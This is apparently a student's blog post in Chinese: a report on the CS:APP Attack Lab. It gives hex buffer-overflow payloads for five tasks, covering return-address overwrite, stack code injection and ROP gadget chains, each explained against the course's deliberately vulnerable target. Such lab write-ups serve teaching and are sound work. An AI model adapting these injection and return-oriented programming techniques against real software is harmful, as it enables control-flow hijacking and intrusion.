<!DOCTYPE HTML>
<html>

<head>
	<link rel="bookmark"  type="image/x-icon"  href="/img/logo.png"/>
	<link rel="shortcut icon" href="/img/logo.png">
	
			    <title>
    Kevin's blog
    </title>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no" />
    <link rel="stylesheet" href="/css/mic_main.css" />
    <link rel="stylesheet" href="/css/dropdownMenu.css" />
    <meta name="keywords" content="Kevin's blog" />
    
    	<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
	 
    <noscript>
        <link rel="stylesheet" href="/css/noscript.css" />
    </noscript>
    <style type="text/css">
        body:before {
          content: ' ';
          position: fixed;
          top: 0;
          background: url('/img/bg.jpg') center 0 no-repeat;
          right: 0;
          bottom: 0;
          left: 0;
          background-size: cover; 
        }
    </style>

			    
  
    <script type="text/x-mathjax-config">
      MathJax.Hub.Config({
        tex2jax: {
          inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
          processEscapes: true,
          skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
        }
      });
    </script>

    <script type="text/x-mathjax-config">
      MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax(), i;
        for (i=0; i < all.length; i += 1) {
          all[i].SourceElement().parentNode.className += ' has-jax';
        }
      });
    </script>
    <script async type="text/javascript" src="//cdn.bootcss.com/mathjax/2.7.1/latest.js?config=TeX-AMS-MML_HTMLorMML"></script>
  


    <script src="/js/jquery.min.js"></script>
    <script src="/js/jquery.scrollex.min.js"></script>
    <script src="/js/jquery.scrolly.min.js"></script>
    <script src="/js/skel.min.js"></script>
    <script src="/js/util.js"></script>
    <script src="/js/main.js"></script>
	
<meta name="generator" content="Hexo 5.4.2"></head>
    
		
<!-- Layouts -->



<!--  代码渲染  -->
<link rel="stylesheet" href="/css/prism_coy.css" />
<link rel="stylesheet" href="/css/typo.css" />
<!-- 文章页 -->
<body class="is-loading">
    <!-- Wrapper 外包 s-->
    <div id="wrapper" class="fade-in">
        <!-- Intro 头部显示 s -->
        <!-- Intro 头部显示 e -->
        <!-- Header 头部logo start -->
        <header id="header">
    <a href="/" class="logo">KEVIN</a>
</header>
        <!-- Nav 导航条 start -->
        <nav id="nav" class="special" >
            <ul class="menu links" >
			<!-- Homepage  主页  --> 
			<li >
	            <a href="/" rel="nofollow">主页</a>
	        </li>
			<!-- categories_name  分类   --> 
	        
	        <li class="active">
	            <a href="#s1">分类</a>
	                    <ul class="submenu">
	                        <li>
	                        <a class="category-link" href="/categories/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/">学习笔记</a></li><li><a class="category-link" href="/categories/%E8%AE%BA%E6%96%87%E9%9A%8F%E7%AC%94/">论文随笔</a></li><li><a class="category-link" href="/categories/%E8%AF%BE%E7%A8%8B%E6%8A%A5%E5%91%8A/">课程报告</a>
	                    </ul>
	        </li>
	        
	        <!-- archives  归档   --> 
	        
	        
		        <!-- Pages 自定义   -->
		        
		        <li>
		            <a href="/tag/" title="标签">
		                标签
		            </a>
		        </li>
		        
		        <li>
		            <a href="/homepage/" title="学术主页">
		                学术主页
		            </a>
		        </li>
		        


            </ul>
            <!-- icons 图标   -->
			<ul class="icons">
                    
                    <li>
                        <a title="github" href="https://github.com/Kevin-thu" target="_blank" rel="noopener">
                            <i class="icon fa fa-github"></i>
                        </a>
                    </li>
                    
                    <li>
                        <a title="twitter" href="https://twitter.com/sze68zkw" target="_blank" rel="noopener">
                            <i class="icon fa fa-twitter"></i>
                        </a>
                    </li>
                    
			</ul>
</nav>

        <div id="main" >
            <div class ="post_page_title_img" style="height: 25rem;background-image: url(https://static.sitestack.cn/projects/CSAPP-3e-Solutions/assets/csapp3e-cover.jpg);background-position: center; background-repeat:no-repeat; background-size:cover;-moz-background-size:cover;overflow:hidden;" >
                <a href="#" style="padding: 4rem 4rem 2rem 4rem ;"><h2 >ICS Lab2 Attack Report</h2></a>
            </div>
            <!-- Post -->
            <div class="typo" style="padding: 3rem;">
                <h1 id="ICS-Lab2-Attack-lab实验报告"><a href="#ICS-Lab2-Attack-lab实验报告" class="headerlink" title="ICS Lab2 Attack lab实验报告"></a>ICS Lab2 Attack lab实验报告</h1><blockquote>
<p>张凯文 2021010729 计12班 2022年12月2日</p>
</blockquote>
<h2 id="Task-1-直接跳转到无参数函数"><a href="#Task-1-直接跳转到无参数函数" class="headerlink" title="Task 1: 直接跳转到无参数函数"></a>Task 1: 直接跳转到无参数函数</h2><h3 id="答案"><a href="#答案" class="headerlink" title="答案"></a>答案</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">00 00 00 00</span><br><span class="line">00 00 00 00</span><br><span class="line">00 00 00 00</span><br><span class="line">00 00 00 00</span><br><span class="line">00 00 00 00</span><br><span class="line">00 00 00 00</span><br><span class="line">d9 1b 40 00 00 00 00 00  /* touch1的地址，64位，小端法表示 */</span><br></pre></td></tr></table></figure>
<h3 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h3><p>从<code>Gets</code>函数返回后，%rsp的值减去0x18，所指向的原返回地址被重写为touch1的地址，因此ret后会跳到touch1执行。</p>
<h3 id="遇到过的问题"><a href="#遇到过的问题" class="headerlink" title="遇到过的问题"></a>遇到过的问题</h3><p>0x18是16进制数，代表的十进制数是24而不是18。</p>
<blockquote>
<p>注：栈帧构造示意图统一见附页</p>
</blockquote>
<h2 id="Task-2-在栈上注入代码实现传参"><a href="#Task-2-在栈上注入代码实现传参" class="headerlink" title="Task 2: 在栈上注入代码实现传参"></a>Task 2: 在栈上注入代码实现传参</h2><h3 id="答案-1"><a href="#答案-1" class="headerlink" title="答案"></a>答案</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">48 c7 c7 d5 ef 76 7b       /* movq $0x7b76efd5,%rdi */</span><br><span class="line">68 0d 1c 40 00             /* pushq $0x401c0d */</span><br><span class="line">c3                         /* retq  */</span><br><span class="line">00 00 00 00 00 </span><br><span class="line">00 00 00 00 00 00</span><br><span class="line">58 2a 62 55 00 00 00 00    /* 注入代码在栈中的起始地址 */</span><br></pre></td></tr></table></figure>
<h3 id="注入代码说明"><a href="#注入代码说明" class="headerlink" title="注入代码说明"></a>注入代码说明</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">movq $0x7b76efd5,%rdi  # 将cookie放入%rdi作为touch2的参数传入</span><br><span class="line">pushq $0x401c0d        # 将touch2的地址压入栈中</span><br><span class="line">retq                   # 栈弹出栈顶元素将%rip设置到栈顶指定返回地址</span><br></pre></td></tr></table></figure>
<h3 id="原理-1"><a href="#原理-1" class="headerlink" title="原理"></a>原理</h3><p>同上理，由于将原返回地址修改为了注入代码的起始地址，函数返回后会执行注入的代码，通过注入代码将unsigned类型参数cookie存入%rdi，再将touch2的地址压栈，跳到touch2地址，实现传参。</p>
<h3 id="遇到过的问题-1"><a href="#遇到过的问题-1" class="headerlink" title="遇到过的问题"></a>遇到过的问题</h3><p>需要通过<code>gdb</code>中<code>info registers</code>或<code>print $rsp</code>&#x2F;<code>$rdi</code>得到注入代码在栈中的起始地址。</p>
<h2 id="Task-3-在栈上存储参数，实现指针类型的参数传递"><a href="#Task-3-在栈上存储参数，实现指针类型的参数传递" class="headerlink" title="Task 3: 在栈上存储参数，实现指针类型的参数传递"></a>Task 3: 在栈上存储参数，实现指针类型的参数传递</h2><h3 id="答案-2"><a href="#答案-2" class="headerlink" title="答案"></a>答案</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">48 c7 c7 78 2a 62 55      /* movq  $0x55622a78,%rdi */</span><br><span class="line">68 32 1d 40 00            /* pushq $0x401d32 */</span><br><span class="line">c3                        /* retq */</span><br><span class="line">00 00 00 00 00</span><br><span class="line">00 00 00 00 00 00</span><br><span class="line">58 2a 62 55 00 00 00 00</span><br><span class="line">37 62 37 36 65 66 64 35   /* cookie的十六进制ASCII码 */ </span><br></pre></td></tr></table></figure>
<h3 id="注入代码说明-1"><a href="#注入代码说明-1" class="headerlink" title="注入代码说明"></a>注入代码说明</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">movq  $0x55622a78,%rdi    # 将cookie的十六进制ASCII码存储在0x55622a70(原来返回地址再上面8个字节)</span><br><span class="line">pushq $0x401d32           # 将touch3的地址压入栈中</span><br><span class="line">retq                      # 调用touch3</span><br></pre></td></tr></table></figure>
<h3 id="原理-2"><a href="#原理-2" class="headerlink" title="原理"></a>原理</h3><p>基本原理与Task 2类似，只是需要注意在原返回地址更高位的地址上存储cookie的十六进制ASCII码（字符串表示），避免在后续调用函数时被覆盖。</p>
<h2 id="Task-4-ROP方式攻击"><a href="#Task-4-ROP方式攻击" class="headerlink" title="Task 4: ROP方式攻击"></a>Task 4: ROP方式攻击</h2><h3 id="答案-3"><a href="#答案-3" class="headerlink" title="答案"></a>答案</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">00 00 00 00</span><br><span class="line">00 00 00 00</span><br><span class="line">00 00 00 00</span><br><span class="line">00 00 00 00</span><br><span class="line">00 00 00 00</span><br><span class="line">00 00 00 00</span><br><span class="line">ea 1d 40 00 00 00 00 00  /* 跳到Gadget code 1: 58 c3   popq %rax */</span><br><span class="line">d5 ef 76 7b 00 00 00 00  /* cookie，被pop到%rax */</span><br><span class="line">f2 1d 40 00 00 00 00 00  /* 跳到Gadget code 2: 48 89 c7 c3   movq %rax,%rdi */</span><br><span class="line">0d 1c 40 00 00 00 00 00  /* 跳到touch2 */</span><br></pre></td></tr></table></figure>
<h3 id="原理与构造思路"><a href="#原理与构造思路" class="headerlink" title="原理与构造思路"></a>原理与构造思路</h3><p>在栈上依次存储<code>Gadget Code</code>的地址，每执行完一段<code>Gadget Code</code>后通过<code>ret</code>指令使%rsp指向的地址-0x08，从而继续跳转到下一段<code>Gadget Code</code>的地址执行相应指令，以此达到自己的目的。</p>
<p>本题构造目标很明确：就是要将参数cookie存入%rdi中实现传参。为此我首先在所给的<code>Gadget farm</code>中用<code>Ctrl+F</code>检索了<code>5f</code>，但没有找到符合要求的<code>popq %rdi</code>指令；因此我转而检索了包含<code>48 89</code>的指令，定位到一条满足要求的机器指令<code>movq %rax,%rdx</code>，说明先要将参数存入%rax中再转入%rdi，因此我进一步把通过检索<code>58</code>找到了符合要求的<code>popq %rax</code>的机器指令。此时思路就很清晰了：只需将cookie存在栈上适当位置，通过<code>popq</code>存到%rax中，进而拷贝到%rdi中，再调用touch2函数，即可实现传参。</p>
<h2 id="Task-5-包含指针参数传递的ROP攻击"><a href="#Task-5-包含指针参数传递的ROP攻击" class="headerlink" title="Task 5: 包含指针参数传递的ROP攻击"></a>Task 5: 包含指针参数传递的ROP攻击</h2><h3 id="答案-4"><a href="#答案-4" class="headerlink" title="答案"></a>答案</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">00 00 00 00</span><br><span class="line">00 00 00 00</span><br><span class="line">00 00 00 00</span><br><span class="line">00 00 00 00</span><br><span class="line">00 00 00 00</span><br><span class="line">00 00 00 00</span><br><span class="line">ea 1d 40 00 00 00 00 00   /* popq %rax */</span><br><span class="line">20 00 00 00 00 00 00 00   /* %rax = 0x20 */</span><br><span class="line">9c 1e 40 00 00 00 00 00   /* %eax -&gt; %edx */</span><br><span class="line">51 1e 40 00 00 00 00 00   /* %edx -&gt; %ecx */</span><br><span class="line">87 1f 40 00 00 00 00 00   /* %ecx -&gt; %esi */</span><br><span class="line">48 1f 40 00 00 00 00 00   /* %rsp -&gt; %rax，将当前栈顶地址存到%rax，注意%rsp指向下一行起点！ */</span><br><span class="line">f2 1d 40 00 00 00 00 00   /* %rax -&gt; %rdi */</span><br><span class="line">42 1e 40 00 00 00 00 00   /* add_xy: %rax = %rdi + %rsi */</span><br><span class="line">f2 1d 40 00 00 00 00 00   /* %rax -&gt; %rdi */</span><br><span class="line">32 1d 40 00 00 00 00 00   /* touch3 */</span><br><span class="line">37 62 37 36 65 66 64 35   /* cookie的十六进制ASCII码 */</span><br></pre></td></tr></table></figure>
<blockquote>
<p>注：上述注释给出的是跳转到对应Gadget Code后执行的实际操作（其中包含一条栈上存储的数据段）。</p>
</blockquote>
<h3 id="原理与构造思路-1"><a href="#原理与构造思路-1" class="headerlink" title="原理与构造思路"></a>原理与构造思路</h3><p>本题需要向%rdi中保存栈上存储的cookie的地址，但栈的地址在每次执行时都可能不同，因此唯一能得到栈上地址信息的办法就是将%rsp的值保存到寄存器中，再加上适当的偏移量offset，得到cookie字符串在栈上的地址。</p>
<p>为此我首先通过检索<code>89</code>找出了所有已有的可以使用的<code>movl</code>和<code>movq</code>指令，发现只能将%rsp的值保存到%rax中，因此同Task 4的道理再进行一次转移即可。</p>
<p>问题在于如何加上offset呢？handout中没有给出<code>add</code>或<code>sub</code>相关的指令机器码，只能从Gadget farm中找答案，此时会惊喜地发现Gadget farm中提供了add_xy这个特殊的函数，恰好能够实现加法操作：<code>%rax = %rdi + %rsi</code>。因此此时只需要想办法将offset存入%rsi中即可。通过罗列出所有可用的<code>mov</code>指令，不难找到这样一条转移关系，如注释中所展示的那样。</p>
<p>最后，将所有Gadget Code地址依次填好，通过计算%rsp存储的栈地址与栈上存放的cookie字符串码地址的字节数之差，即可确定offset的值。</p>
<h3 id="遇到过的困难"><a href="#遇到过的困难" class="headerlink" title="遇到过的困难"></a>遇到过的困难</h3><ol>
<li>在没有发现通过add_xy实现加法之前，为如何实现offset的记录苦思冥想了很久；</li>
<li>将当前栈顶地址存到%rax时需要注意，在执行某一段Gadget Code时，%rsp指向的是下一段地址起点（当前Gadget Code在栈中的地址地址再高8字节的地址）。</li>
</ol>
<h2 id="附录：栈帧构造示意图"><a href="#附录：栈帧构造示意图" class="headerlink" title="附录：栈帧构造示意图"></a>附录：栈帧构造示意图</h2><p>见下页。</p>
<blockquote>
<p>注：Task 5栈帧构造与寄存器之间的数据转移关系较为复杂，但基本原理与Task 4相近，且构造思路和具体执行流程都已在报告和代码注释中给予了详细清晰的说明，因此不再额外附图解释。</p>
</blockquote>

            </div>

            <!-- Post Comments -->
            
    <!-- 使用 DISQUS_CLICK -->
<div id="disqus-comment">
    <div id="disqus_thread"></div>

<!-- add animation -->
<style>
	.disqus_click_btn {
            line-height: 30px;
            margin: 0;
            min-width: 50px;
            padding: 0 14px;
            display: inline-block;
            font-family: "Roboto", "Helvetica", "Arial", sans-serif;
            font-size: 14px;
            font-weight: 400;
            text-transform: uppercase;
            letter-spacing: 0;
            overflow: hidden;
            will-change: box-shadow;
            transition: box-shadow .2s cubic-bezier(.4, 0, 1, 1), background-color .2s cubic-bezier(.4, 0, .2, 1), color .2s cubic-bezier(.4, 0, .2, 1);
            outline: 0;
            cursor: pointer;
            text-decoration: none;
            text-align: center;
            vertical-align: middle;
            border: 0;
            background: rgba(158, 158, 158, .2);
            box-shadow: 0 2px 2px 0 rgba(0, 0, 0, .14), 0 3px 1px -2px rgba(0, 0, 0, .2), 0 1px 5px 0 rgba(0, 0, 0, .12);
            color: #fff;
            background-color: #7EC0EE;
            text-shadow: 0
        }
</style>
	
<div class="btn_click_load" id="disqus_bt"> 
    <button class="disqus_click_btn">点击查看评论</button>
</div>

<!--
<script type="text/javascript">
$('.btn_click_load').click(function() {
    /* * * CONFIGURATION VARIABLES: EDIT BEFORE PASTING INTO YOUR WEBPAGE * * */
    var disqus_shortname = 'http-miccall-tech'; // required: replace example with your forum shortname

    /* * * DON'T EDIT BELOW THIS LINE * * */
    (function() {
      var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
      dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
      (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
    })();

    document.getElementById('disqus_bt').style.display = "none";
});
</script>
-->
<script type="text/javascript">
    var disqus_config = function () {
        this.page.url = 'http://example.com/2023/01/06/attacklab/';  // Replace PAGE_URL with your page's canonical URL variable
        this.page.identifier = 'http://example.com/2023/01/06/attacklab/'; // Replace PAGE_IDENTIFIER with your page's unique identifier variable
    };
</script>

<script type="text/javascript">
    $('.btn_click_load').click(function() {  //click to load comments
        (function() { // DON'T EDIT BELOW THIS LINE
            var d = document;
            var s = d.createElement('script');
            s.src = '//http-miccall-tech.disqus.com/embed.js';
            s.setAttribute('data-timestamp', + new Date());
            (d.head || d.body).appendChild(s);
        })();
        $('.btn_click_load').css('display','none');
    });
</script>
</div>
<style>
    #disqus-comment{
        background-color: #eee;
        padding: 2pc;
    }
</style>


        </div>
        <!-- Copyright 版权 start -->
                <div id="copyright">
            <ul>
                <li>&copy;Powered By <a target="_blank" rel="noopener" href="https://hexo.io/zh-cn/" style="border-bottom: none;">hexo</a></li>
                <li>Design: <a target="_blank" rel="noopener" href="http://miccall.tech " style="border-bottom: none;">miccall</a></li>
            </ul>
            
                <span id="busuanzi_container_site_pv">本站总访问量<span id="busuanzi_value_site_pv"></span>次</span>
			
        </div>
    </div>
</body>



 	
</html>
